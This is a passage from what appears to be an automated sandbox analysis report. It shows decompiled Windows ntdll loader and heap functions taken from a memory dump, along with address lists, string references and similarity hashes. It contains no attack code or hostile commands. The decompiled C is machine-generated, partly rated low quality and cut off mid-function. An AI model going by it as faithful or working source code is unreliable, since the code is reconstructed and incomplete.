						E04D2E692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t18);
						_t49 = _t49 + 0x1c;
					}
					_t45 = 0;
					goto L8;
				} else {
					goto L10;
				}
			}

0x04ce4c42
0x04ce4c47
0x04ce4c4a
0x04ce4c4c
0x04ce4c52
0x04ce4cb8
0x04ce4cbe
0x04ce4cbe
0x04ce4c5a
0x04ce4c5d
0x04ce4c69
0x04ce4c6f
0x04ce4c74
0x04ce4cd6
0x04ce4cda
0x04d233b9
0x04d233be
0x04d233f7
0x04d233f7
0x04d233be
0x04ce4cda
0x04ce4c76
0x04ce4c84
0x04ce4c8c
0x04ce4c90
0x04ce4ca9
0x04ce4ca9
0x04ce4cae
0x04ce4ce4
0x04ce4cee
0x04ce4cf3
0x04ce4cf3
0x04ce4ce6
0x04ce4ce6
0x04ce4cb2
0x04d23463
0x04d2347b
0x04d23480
0x04d2348a
0x04d23490
0x04d23490
0x04d2348a
0x00000000
0x04ce4cb2
0x04ce4c98
0x04ce4cc5
0x04d23429
0x00000000
0x00000000
0x04d2342f
0x04ce4cc5
0x04ce4ca1
0x04d23434
0x04d23435
0x04d2344f
0x04d23454
0x04d23454
0x04ce4ca7
0x00000000
0x00000000
0x00000000
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 04D2344A, 04D23476
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 04D23439
Querying the active activation context failed with status 0x%08lx, xrefs: 04D23466
LdrpFindDllActivationContext, xrefs: 04D23440, 04D2346C

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 9cd349b1d61f6f40365c21625f08f6427fa7e51ada26da8ae31c1dca02fc7bf6
Instruction ID: 75f1f3f79478cdc0640e00fbdd764bf47a46f994efdcf0ce548c18e7ccffe763
Opcode Fuzzy Hash: 9cd349b1d61f6f40365c21625f08f6427fa7e51ada26da8ae31c1dca02fc7bf6
Instruction Fuzzy Hash: 2E313972F00351AFDF399F1B884CA76B2A6FB40758F0A8366D90157250E7A4BE808699

Uniqueness

Uniqueness Score: -1.00%

Function 04D60D24 Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 04D60DCA, 04D60DDD, 04D60DDF, 04D60E44
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 04D60DE1
HEAP[%wZ]: , xrefs: 04D60DBD, 04D60E37
This is located in the %s field of the heap header., xrefs: 04D60E56

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 9ff8f5d5eac5becc029f3c2f102c4d7b2331cd9aa962f05b6a77cf64a72cdb9d
Instruction ID: 9d6c1a93d53d60182c1dba17c2c228e83a2b8be8cc2c9348941d50b68301ffb8
Opcode Fuzzy Hash: 9ff8f5d5eac5becc029f3c2f102c4d7b2331cd9aa962f05b6a77cf64a72cdb9d
Instruction Fuzzy Hash: 39310F31250520FFD712DB68D884F6673EAEB04B68F184559F506CB292EB71FE50EB60

Uniqueness

Uniqueness Score: -1.00%

Function 04CD237A Relevance: 5.1, Strings: 4, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E04CD237A(intOrPtr* __ecx, void* __edx) {
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				void* __ebx;
				intOrPtr _t22;
				intOrPtr _t29;
				signed int _t30;
				signed char _t36;
				intOrPtr _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t48;
				signed int _t50;
				intOrPtr* _t51;
				signed int _t53;
				signed int _t55;
				void* _t59;

				_t38 =  *0x4da38b8; // 0x1
				_t50 = 0;
				_v16 = __ecx;
				_v12 = 0;
				_t55 = 0;
				if(_t38 == 0) {
					L2:
					if(_t38 == 1) {
						_t22 =  *0x4da68d8; // 0x0
						if(_t22 != 0) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50, _t22);
							 *0x4da68d8 = _t50;
							 *0x4da5d4c = _t50;
						}
					}
					 *0x4da38b8 = _t38;
					return _t55;
				}
				_t59 =  *0x4da68d8 - _t55; // 0x0
				if(_t59 != 0) {
					 *0x4da38b8 = 0;
					_t55 = E04D31BB6(_t38,  &_v8);
					if(_t55 >= 0) {
						_t51 =  *0x4da68d8; // 0x0
						while( *_t51 != 0) {
							 *0x4da91e0(_t51, 0, 1, 1, 0, 1, 0x10);
							_v8();
							if(0 == 0) {
								_t55 = 0xc0000142;
								L21:
								_t50 = 0;
								goto L2;
							}
							_t42 = _t51;
							_t10 = _t42 + 2; // 0x2
							_t48 = _t10;
							do {
								_t29 =  *_t42;
								_t42 = _t42 + 2;
							} while (_t29 != _v12);
							_t51 = _t51 + (_t42 - _t48 >> 1) * 2 + 2;
						}
						_t30 =  *0x7ffe0330;
						_t53 =  *0x4da9218; // 0x0
						_v12 = _t30;
						_t45 = 0x20;
						_t46 = _t45 - (_t30 & 0x0000001f);
						asm("ror edi, cl");
						E04CBFED0(0x4da32d8);
						if( *0x4da65f4 < 3) {
							_t46 = _v16;
							if(( *( *_v16 - 0x20) & 0x00000800) == 0) {
								E04CA6704(_t46, _t53 ^ _v12);
							}
						}
						_push(0x4da32d8);
						E04CBE740(_t46);
						goto L21;
					}
					_t36 =  *0x4da37c0; // 0x0
					if((_t36 & 0x00000003) != 0) {
						E04D2E692("minkernel\\ntdll\\ldrinit.c", 0xba1, "LdrpDynamicShimModule", 0, "Getting ApphelpCheckModule failed with status 0x%08lx\n", _t55);
						_t36 =  *0x4da37c0; // 0x0
					}
					if((_t36 & 0x00000010) != 0) {
						asm("int3");
					}
					_t55 = _t50;
				}
				goto L2;
			}

0x04cd2383
0x04cd238b
0x04cd238d
0x04cd2390
0x04cd2393
0x04cd2397
0x04cd23a5
0x04cd23a8
0x04cd23aa
0x04cd23b1
0x04d1a878
0x04d1a87d
0x04d1a883
0x04d1a883
0x04cd23b1
0x04cd23ba
0x04cd23c3
0x04cd23c3
0x04cd2399
0x04cd239f
0x04d1a784
0x04d1a78f
0x04d1a793
0x04d1a7cd
0x04d1a80b
0x04d1a7e3
0x04d1a7e9
0x04d1a7ee
0x04d1a866
0x04d1a85f
0x04d1a85f
0x00000000
0x04d1a85f
0x04d1a7f0
0x04d1a7f2
0x04d1a7f2
0x04d1a7f5
0x04d1a7f5
0x04d1a7f8
0x04d1a7fb
0x04d1a808
0x04d1a808
0x04d1a812
0x04d1a817
0x04d1a81f
0x04d1a825
0x04d1a826
0x04d1a82d
0x04d1a82f
0x04d1a83b
0x04d1a83d
0x04d1a849
0x04d1a850
0x04d1a850
0x04d1a849
0x04d1a855
0x04d1a85a
0x00000000
0x04d1a85a
0x04d1a795
0x04d1a79c
0x04d1a7b4
0x04d1a7b9
0x04d1a7be
0x04d1a7c3
0x04d1a7c5
0x04d1a7c5
0x04d1a7c6
0x04d1a7c6
0x00000000

Strings

LdrpDynamicShimModule, xrefs: 04D1A7A5
minkernel\ntdll\ldrinit.c, xrefs: 04D1A7AF
apphelp.dll, xrefs: 04CD2382
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 04D1A79F

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: f4c39af0405990db13479cdb5cb0b9c4dc069514b00f756ebf44fc0d4ccb067a
Instruction ID: 02650ea13085edd578b2c6c66deefd85d3717f822cd99d6ce29cc40a0fd125d8
Opcode Fuzzy Hash: f4c39af0405990db13479cdb5cb0b9c4dc069514b00f756ebf44fc0d4ccb067a
Instruction Fuzzy Hash: E1310A72F01201FBEB109F69E895A6D77B6FB80B04F184059ED41A7350D774BD51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04CC28C0 Relevance: 4.7, Strings: 3, Instructions: 966
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E04CC28C0(signed int __ecx, signed char __edx, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v33;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int* _v64;
				char _v65;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed short _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				char _v97;
				signed char _v98;
				signed char _v99;
				signed short _v102;
				signed short _v104;
				signed int _v108;
				char _v112;
				signed int _v116;
				char _v120;
				intOrPtr* _v124;
				signed int _v128;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed char _v164;
				intOrPtr _v172;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				intOrPtr _v192;
				signed int _v200;
				signed short _v220;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t471;
				signed int _t474;
				signed int _t477;
				signed int _t478;
				intOrPtr* _t479;
				signed char _t480;
				signed char _t482;
				signed char _t487;
				signed int _t489;
				signed int* _t490;
				signed int _t491;
				signed int _t495;
				char* _t496;
				intOrPtr _t498;
				signed int _t503;
				intOrPtr* _t511;
				intOrPtr _t516;
				signed char _t530;
				signed int _t533;
				intOrPtr* _t534;
				signed int _t535;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				signed int _t542;
				signed int _t544;
				signed int* _t546;
				signed char _t551;
				signed int _t552;
				signed int _t561;
				signed int _t567;
				intOrPtr _t569;
				intOrPtr _t572;
				signed int _t581;
				signed int _t600;
				signed char _t608;
				signed int _t610;
				signed int _t611;
				void* _t612;
				void* _t640;
				signed int _t645;
				void* _t646;
				signed short _t650;
				signed int _t653;
				signed int _t655;
				char* _t656;
				intOrPtr _t657;
				signed short _t663;
				signed int _t676;
				signed int _t683;
				signed int _t684;
				unsigned int _t686;
				signed int _t687;
				signed int _t688;
				signed int _t689;
				signed int _t690;
				signed short _t691;
				signed int _t692;
				signed int _t693;
				signed int _t695;
				signed char _t707;
				signed int _t709;
				unsigned int _t714;
				signed int _t717;
				intOrPtr* _t721;
				signed short* _t724;
				unsigned int _t729;
				signed short _t733;
				signed int _t735;
				unsigned int _t737;
				signed int _t738;
				intOrPtr _t740;
				signed int _t752;
				signed char _t756;
				signed int _t758;
				signed int _t759;
				signed int _t760;
				unsigned int _t761;
				signed int* _t763;
				signed int _t770;
				signed int _t772;
				signed int _t774;
				signed int _t778;
				intOrPtr* _t780;
				signed char _t783;
				void* _t784;
				intOrPtr _t788;
				unsigned int _t794;
				signed char _t796;
				unsigned int _t801;
				signed int _t804;
				intOrPtr _t805;
				signed short _t806;
				signed int _t807;
				signed int* _t808;
				signed int _t809;
				signed int _t811;
				signed int _t822;
				signed int _t823;
				void* _t826;
				signed int _t827;
				signed int _t828;
				intOrPtr _t829;
				intOrPtr _t830;
				signed int _t837;
				signed int _t839;
				signed int _t842;
				void* _t843;
				intOrPtr _t844;

				_t756 = __edx;
				_push(0xfffffffe);
				_push(0x4d8c150);
				_push(E04CFAD20);
				_push( *[fs:0x0]);
				_t844 = _t843 - 0xc8;
				_t471 =  *0x4dab370;
				_v12 = _v12 ^ _t471;
				_push(_t471 ^ _t842);
				 *[fs:0x0] =  &_v20;
				_v28 = _t844;
				_v32 = __edx;
				_t804 = __ecx;
				_v76 = __ecx;
				_t676 = __ecx;
				_v88 = __ecx;
				_v96 = 0;
				_v33 = 0;
				_v136 = 0;
				if(_a4 != 0) {
					_t822 = _a4 + 0xfffffff8;
					_t686 = _t822;
					__eflags =  *(_t822 + 7) - 5;
					if( *(_t822 + 7) == 5) {
						_t686 = _t686 - (( *(_t822 + 6) & 0x000000ff) << 3);
						__eflags = _t686;
					}
					_v40 = _t686;
					__eflags =  *((char*)(_t804 + 0xea)) - 2;
					if( *((char*)(_t804 + 0xea)) != 2) {
						L44:
						__eflags = _t686 - _t804;
						if(_t686 != _t804) {
							_t758 =  *(_t804 + 0x44) | _v32;
							_v32 = _t758;
							__eflags = _t758 & 0x61000000;
							if((_t758 & 0x61000000) == 0) {
								L49:
								_t474 = _a8;
								__eflags = _t474 - 0x7fffffff;
								if(_t474 <= 0x7fffffff) {
									__eflags = _t474;
									_t687 = _t474;
									if(_t474 == 0) {
										_t687 = 1;
									}
									_t477 =  *((intOrPtr*)(_t804 + 0x94)) + _t687 &  *(_t804 + 0x98);
									__eflags = _t477 - 0x10;
									if(_t477 < 0x10) {
										_t477 = 0x10;
									}
									_v48 = _t477;
									_v52 = 0;
									_v8 = 1;
									__eflags = _v32 & 0x00000001;
									if(__eflags != 0) {
										_v44 = 1;
										goto L65;
									} else {
										_t740 =  *((intOrPtr*)(_t804 + 0xc8));
										_t788 =  *[fs:0x18];
										asm("lock btr dword [eax], 0x0");
										if(__eflags >= 0) {
											__eflags =  *((intOrPtr*)(_t740 + 0xc)) -  *((intOrPtr*)(_t788 + 0x24));
											if( *((intOrPtr*)(_t740 + 0xc)) !=  *((intOrPtr*)(_t788 + 0x24))) {
												_v116 = 0;
												__eflags =  *0x4da5da8;
												if( *0x4da5da8 == 0) {
													E04CBFED0( *((intOrPtr*)(_t804 + 0xc8)));
													_v44 = 1;
													_t804 = _v76;
													E04CE9CEB(_t804, 1);
													_v65 = 1;
													_v33 = 1;
													_v32 = _v32 ^ 0x00000001;
													goto L65;
												} else {
													_v65 = 0;
													 *( *[fs:0x18] + 0xbf4) = 0xc0000194;
													_t830 =  *[fs:0x18];
													_v172 = _t830;
													 *((intOrPtr*)(_t830 + 0x34)) = E04CDABA0(0xc0000194);
												}
											} else {
												_t97 = _t740 + 8;
												 *_t97 =  *(_t740 + 8) + 1;
												__eflags =  *_t97;
												goto L60;
											}
										} else {
											 *((intOrPtr*)(_t740 + 0xc)) =  *((intOrPtr*)(_t788 + 0x24));
											 *(_t740 + 8) = 1;
											L60:
											_v116 = 1;
											 *((intOrPtr*)(_t804 + 0x214)) =  *((intOrPtr*)(_t804 + 0x214)) + 1;
											_v44 = 1;
											_v65 = 1;
											_v33 = 1;
											_v32 = _v32 ^ 0x00000001;
											L65:
											_v8 = 2;
											__eflags =  *(_t822 + 7) - 5;
											if( *(_t822 + 7) == 5) {
												_t822 = _t822 - (( *(_t822 + 6) & 0x000000ff) << 3);
												__eflags = _t822;
											}
											_t688 = _t822;
											_v40 = _t822;
											__eflags =  *(_t804 + 0x4c);
											if( *(_t804 + 0x4c) != 0) {
												 *_t822 =  *_t822 ^  *(_t804 + 0x50);
												__eflags =  *(_t822 + 3) - ( *(_t688 + 2) ^  *(_t688 + 1) ^  *_t688);
												if(__eflags != 0) {
													_push(_t688);
													E04D6D646(_t676, _t804, _t822, _t804, _t822, __eflags);
												}
											}
											_v96 = _t822;
											_t689 =  *_t822 & 0x0000ffff;
											_t478 =  *(_t804 + 0xb4);
											while(1) {
												_t805 =  *((intOrPtr*)(_t478 + 4));
												__eflags = _t689 - _t805;
												if(_t689 < _t805) {
													break;
												}
												_t759 =  *_t478;
												__eflags = _t759;
												if(_t759 != 0) {
													_t478 = _t759;
													continue;
												} else {
													_t760 = _t805 - 1;
													_v140 = _t760;
												}
												L75:
												__eflags = _t760 - _t805;
												if(_t760 >= _t805) {
													L80:
													_v144 = 0;
												} else {
													__eflags = _t689 - _t760;
													if(_t689 != _t760) {
														goto L80;
													} else {
														_t738 = _t689 -  *((intOrPtr*)(_t478 + 0x14));
														__eflags =  *(_t478 + 8);
														if( *(_t478 + 8) != 0) {
															_t738 = _t738 + _t738;
															__eflags = _t738;
														}
														_v144 =  *((intOrPtr*)(_t478 + 0x20)) + _t738 * 4;
													}
												}
												__eflags = _v32 & 0x3c000100;
												if((_v32 & 0x3c000100) != 0) {
													L84:
													_t149 =  &_v48;
													 *_t149 = _v48 + 8;
													__eflags =  *_t149;
												} else {
													__eflags =  *(_t676 + 0xbc);
													if( *(_t676 + 0xbc) != 0) {
														goto L84;
													} else {
														__eflags =  *(_t822 + 2) & 0x00000002;
														if(( *(_t822 + 2) & 0x00000002) != 0) {
															goto L84;
														}
													}
												}
												_t151 = _t822 + 7; // -241
												_t479 = _t151;
												_v64 = _t479;
												_t480 =  *_t479;
												_t690 = _t480 & 0x000000ff;
												__eflags = _t690 & 0xffffff3f;
												if((_t690 & 0xffffff3f) != 0) {
													__eflags = _t480 - 4;
													if(_t480 != 4) {
														_t806 =  *_t822 & 0x0000ffff;
														_t761 = _t806;
														_v80 = _t761;
														_v56 = _t761;
														__eflags = _t480 - 5;
														if(_t480 != 5) {
															__eflags = _t480 & 0x00000040;
															if((_t480 & 0x00000040) == 0) {
																_t482 = _t480 & 0x0000003f;
																__eflags = _t482 - 0x3f;
																if(_t482 == 0x3f) {
																	__eflags = _t482;
																	if(_t482 >= 0) {
																		__eflags =  *(_t676 + 0x4c);
																		if( *(_t676 + 0x4c) == 0) {
																			_t691 = _t806;
																			_v104 = _t691;
																		} else {
																			_t691 =  *_t822;
																			_v220 = _t691;
																			__eflags =  *(_t676 + 0x4c) & _t691;
																			if(( *(_t676 + 0x4c) & _t691) != 0) {
																				_t691 = _t691 ^  *(_t676 + 0x50);
																				__eflags = _t691;
																				_v220 = _t691;
																			}
																			_v104 = _t691;
																			_t822 = _v40;
																			_t761 = _v56;
																			_v80 = _t761;
																		}
																		_t692 = _t691 & 0x0000ffff;
																		_v148 = _t692;
																	} else {
																		_t729 = _t822 >> 0x00000003 ^  *_t822 ^  *0x4da6964 ^ _t676;
																		__eflags = _t729;
																		if(_t729 == 0) {
																			_t828 = _t822 - (_t729 >> 0xd);
																			__eflags = _t828;
																			_t612 =  *_t828;
																		} else {
																			_t612 = 0;
																		}
																		_t692 =  *(_t612 + 0x14) & 0x0000ffff;
																		_v148 = _t692;
																		_t822 = _v40;
																		_t761 = _v56;
																		_v80 = _t761;
																	}
																	_t205 = _t692 * 8; // 0xcccccccc
																	_t693 =  *(_t822 + _t205 - 4);
																} else {
																	_t693 = _t690 & 0x0000003f;
																}
															} else {
																_t693 =  *(_t822 + (_t690 & 0x0000003f) * 8 + 4) & 0x0000ffff;
															}
														} else {
															_t693 =  *(_t822 + 4) & 0x0000ffff ^  *(_t676 + 0x54) & 0x0000ffff;
														}
														_v108 = _t693;
														_v52 = _t761 * 8 - _t693;
														__eflags = _t761 - ( *(_t676 + 0xf0) & 0x0000ffff);
														if(_t761 < ( *(_t676 + 0xf0) & 0x0000ffff)) {
															_v80 = _t761 & 0x00000007;
															_t783 =  *((intOrPtr*)((_t761 >> 3) + _t676 + 0xf2));
															_t608 = _v44 << _v80;
															__eflags = _t783 & _t608;
															_t761 = _v56;
															if((_t783 & _t608) != 0) {
																_t822 = _v40;
																goto L118;
															} else {
																_v80 = _t761;
																_t724 =  *((intOrPtr*)(_t676 + 0xec)) + _t761 * 2;
																_t610 =  *_t724 & 0x0000ffff;
																__eflags = _t610 - 1;
																if(_t610 > 1) {
																	_t611 = _t610 - 1;
																	__eflags = _t611;
																	 *_t724 = _t611;
																}
																_t822 = _v40;
															}
														}
													} else {
														_t158 = _t822 - 0x18; // -272
														_t784 = _t158;
														__eflags =  *(_t676 + 0x4c);
														if( *(_t676 + 0x4c) == 0) {
															_t733 =  *_t822;
															_v102 = _t733;
														} else {
															_t733 =  *_t822;
															_v84 = _t733;
															__eflags =  *(_t676 + 0x4c) & _t733;
															if(( *(_t676 + 0x4c) & _t733) != 0) {
																_t733 = _t733 ^  *(_t676 + 0x50);
																__eflags = _t733;
																_v84 = _t733;
															}
															_v102 = _t733;
															_t822 = _v40;
														}
														_t735 =  *((intOrPtr*)(_t784 + 0x10)) - (_t733 & 0x0000ffff);
														_v52 = _t735;
														_t761 = ( *_t822 & 0x0000ffff) + _t735 >> 3;
														_v56 = _t761;
														_t737 = _v48 + 0x18;
														_v48 = _t737;
														_v48 = _t737;
														_t175 = _t737 + 0xfff; // 0xfef
														_v48 = _t175 & 0xfffff000;
														L118:
														_v80 = _t761;
													}
													_t695 = _v48 >> 3;
													_t807 = _t695;
													_v60 = _t807;
													__eflags = _t695 - _t761;
													if(_t695 > _t761) {
														__eflags =  *_v64 - 4;
														if( *_v64 == 4) {
															L165:
															__eflags = _v32 & 0x00000010;
															if((_v32 & 0x00000010) == 0) {
																_t697 = _v32 & 0xc003ffff;
																_v32 = _t697;
																_t365 = _t822 + 2; // -246
																_t808 = _t365;
																_t487 =  *_t808;
																__eflags = _t487 & 0x00000002;
																if((_t487 & 0x00000002) == 0) {
																	_t489 =  *( *[fs:0x30] + 0x68);
																	_v200 = _t489;
																	_t822 = _v40;
																	__eflags = _t489 & 0x00000800;
																	if((_t489 & 0x00000800) != 0) {
																		_t380 = _t822 + 3; // 0x75ffec8b
																		_t530 =  *_t380;
																		_v98 = _t530;
																		__eflags = _t530;
																		if(_t530 != 0) {
																			_v99 = _t530;
																			_t533 = (_t530 & 0x000000ff) << 0x00000012 | _t697;
																			__eflags = _t533;
																			_v32 = _t533;
																		}
																	}
																} else {
																	_t709 = _t697 & 0xfffff1ff;
																	_v32 = _t709;
																	_t770 = (_t487 & 0xe0 | 0x00000010) << 0x00000004 | _t709;
																	_v32 = _t770;
																	_v8 = 3;
																	_t697 = _t822;
																	_t534 = E04CE3AE9(_t822);
																	_v124 = _t534;
																	_t535 =  *(_t534 + 2) & 0x0000ffff;
																	__eflags = _t535;
																	if(__eflags != 0 && __eflags >= 0) {
																		_t537 = _t535 << 0x00000012 | _t770;
																		__eflags = _t537;
																		_v32 = _t537;
																	}
																	_v8 = 2;
																}
																_t490 = _t676 + 0x4c;
																_v64 = _t490;
																__eflags =  *_t490;
																if( *_t490 != 0) {
																	_t386 = _t822 + 1; // 0xec8b55ff
																	 *(_t822 + 3) =  *_t386 ^  *_t822 ^  *_t808;
																	 *_t822 =  *_t822 ^  *(_t676 + 0x50);
																	__eflags =  *_t822;
																}
																_v96 = 0;
																_v8 = 4;
																_t491 = E04CC5D90(_t697, _v76, _v32, _a8);
																_v72 = _t491;
																_v8 = 2;
																__eflags = _t491;
																if(_t491 == 0) {
																	_t809 = _v72;
																} else {
																	_t396 = _t491 - 8; // -8
																	_t811 = _t396;
																	__eflags =  *((char*)(_t811 + 7)) - 5;
																	if( *((char*)(_t811 + 7)) == 5) {
																		_t811 = _t811 - (( *(_t811 + 6) & 0x000000ff) << 3);
																		__eflags = _t811;
																	}
																	_t701 = _t811;
																	_v128 = _t811;
																	_t763 = _v64;
																	__eflags =  *_t763;
																	if( *_t763 != 0) {
																		 *_t811 =  *_t811 ^  *(_t676 + 0x50);
																		__eflags =  *(_t811 + 3) - ( *(_t701 + 2) ^  *(_t701 + 1) ^  *_t701);
																		if(__eflags != 0) {
																			_push(_t701);
																			_t701 = _t676;
																			E04D6D646(_t676, _t676, _t811, _t811, _t822, __eflags);
																			_t763 = _v64;
																		}
																	}
																	_v96 = _t811;
																	__eflags =  *(_t811 + 2) & 0x00000002;
																	if(( *(_t811 + 2) & 0x00000002) != 0) {
																		_t511 = E04CE3AE9(_t811);
																		_v92 = _t511;
																		__eflags =  *_t763;
																		if( *_t763 != 0) {
																			 *_t822 =  *_t822 ^  *(_t676 + 0x50);
																			_t412 = _t822 + 2; // 0xffec8b55
																			_t413 = _t822 + 1; // 0xec8b55ff
																			_t707 =  *_t412 ^  *_t413 ^  *_t822;
																			__eflags =  *(_t822 + 3) - _t707;
																			if(__eflags != 0) {
																				_push(_t707);
																				E04D6D646(_t676, _t676, _t822, _t811, _t822, __eflags);
																				_t511 = _v92;
																			}
																		}
																		_v8 = 5;
																		__eflags =  *(_t822 + 2) & 0x00000002;
																		if(( *(_t822 + 2) & 0x00000002) == 0) {
																			_t701 = 0;
																			__eflags = 0;
																			 *_t511 = 0;
																			 *((intOrPtr*)(_t511 + 4)) = 0;
																		} else {
																			_t516 = E04CE3AE9(_t822);
																			_v124 = _t516;
																			_t701 = _v92;
																			 *((intOrPtr*)(_v92 + 4)) =  *((intOrPtr*)(_t516 + 4));
																		}
																		_v8 = 2;
																		__eflags =  *(_t676 + 0x4c);
																		if( *(_t676 + 0x4c) != 0) {
																			_t427 = _t822 + 2; // 0xffec8b55
																			_t428 = _t822 + 1; // 0xec8b55ff
																			 *(_t822 + 3) =  *_t427 ^  *_t428 ^  *_t822;
																			 *_t822 =  *_t822 ^  *(_t676 + 0x50);
																			__eflags =  *_t822;
																		}
																	}
																	__eflags =  *_v64;
																	if( *_v64 != 0) {
																		 *(_t811 + 3) =  *(_t811 + 2) ^  *(_t811 + 1) ^  *_t811;
																		 *_t811 =  *_t811 ^  *(_t676 + 0x50);
																		__eflags =  *_t811;
																	}
																	_v96 = 0;
																	__eflags = _v33;
																	if(_v33 != 0) {
																		_push( *((intOrPtr*)(_t676 + 0xc8)));
																		E04CBE740(_t701);
																		_v33 = 0;
																		_t440 =  &_v32;
																		 *_t440 = _v32 & 0xfffffffe;
																		__eflags =  *_t440;
																	}
																	_t503 = _a8;
																	__eflags = _t503 - _v52;
																	if(_t503 >= _v52) {
																		_t503 = _v52;
																	}
																	_t809 = _v72;
																	E04CF88C0(_t809, _a4, _t503);
																	E04CC3BC0(_v76, _v32, _a4);
																}
																_v136 = _a4;
																_a4 = _t809;
															} else {
																_a4 = 0;
															}
														} else {
															_t538 = E04CB1380(_t676, _v32, _t822, _a8, _t807);
															__eflags = _t538;
															if(_t538 == 0) {
																goto L165;
															}
														}
													} else {
														_t228 = _t695 + 1; // 0x9
														_t539 = _t228;
														__eflags = _t539 - _t761;
														if(_t539 == _t761) {
															_t807 = _t539;
															_v60 = _t807;
															_t230 =  &_v48;
															 *_t230 = _v48 + 8;
															__eflags =  *_t230;
															_t695 = _t539;
														}
														__eflags =  *_v64 - 4;
														if( *_v64 != 4) {
															__eflags =  *(_t822 + 2) & 0x00000002;
															if(( *(_t822 + 2) & 0x00000002) == 0) {
																_t542 =  *( *[fs:0x30] + 0x68);
																_v184 = _t542;
																__eflags = _t542 & 0x00000800;
																if((_t542 & 0x00000800) == 0) {
																	goto L129;
																} else {
																	_t822 = _v40;
																	_t261 = _t822 + 3; // 0x75ffec8b
																	_v97 =  *_t261;
																	_t807 = _v60;
																	 *(_t822 + 3) = E04D59AFE(_t676,  *_t261 & 0x000000ff,  *_t822 & 0x0000ffff, _t807, 4);
																	_v80 = _v56;
																}
															} else {
																_t780 = _t822 + (( *_t822 & 0x0000ffff) - 1) * 8;
																_v124 = _t780;
																_t721 = _t822 + (_t695 - 1) * 8;
																_v92 = _t721;
																 *_t721 =  *_t780;
																 *((intOrPtr*)(_t721 + 4)) =  *((intOrPtr*)(_t780 + 4));
																_t600 =  *( *[fs:0x30] + 0x68);
																_v180 = _t600;
																__eflags = _t600 & 0x00000800;
																if((_t600 & 0x00000800) == 0) {
																	L129:
																	_v80 = _v56;
																	_t807 = _v60;
																} else {
																	_t827 = _v92;
																	_t807 = _v60;
																	_v80 = _v56;
																	 *((short*)(_t827 + 2)) = E04D59AFE(_t676,  *((intOrPtr*)(_t827 + 2)), _v56, _t807, 4);
																}
																_t822 = _v40;
															}
														} else {
															 *_t822 = _v48 - _a8;
														}
														_t772 = _v52;
														_t544 = _a8;
														__eflags = _t544 - _t772;
														if(_t544 > _t772) {
															__eflags = _v32 & 0x00000008;
															if((_v32 & 0x00000008) == 0) {
																__eflags =  *(_t676 + 0x40) & 0x00000040;
																if(( *(_t676 + 0x40) & 0x00000040) != 0) {
																	_t717 = _v52 & 0x00000003;
																	__eflags = _t717;
																	_v152 = _t717;
																	if(_t717 != 0) {
																		__eflags = 4;
																		_t717 = 4 - _t717;
																		_v152 = _t717;
																		_t544 = _a8;
																	}
																	_t778 = _v52;
																	__eflags = _t544 - _t717 + _t778;
																	_t676 = _v88;
																	if(_t544 > _t717 + _t778) {
																		_t581 = _t544 - _t717 - _t778 & 0xfffffffc;
																		__eflags = _t581;
																		if(_t581 != 0) {
																			_t287 = _t778 + 8; // 0x8
																			__eflags = _t287 + _t717 + _t822;
																			E04D08140(_t287 + _t717 + _t822, _t581, 0xbaadf00d);
																		}
																		goto L140;
																	}
																}
															} else {
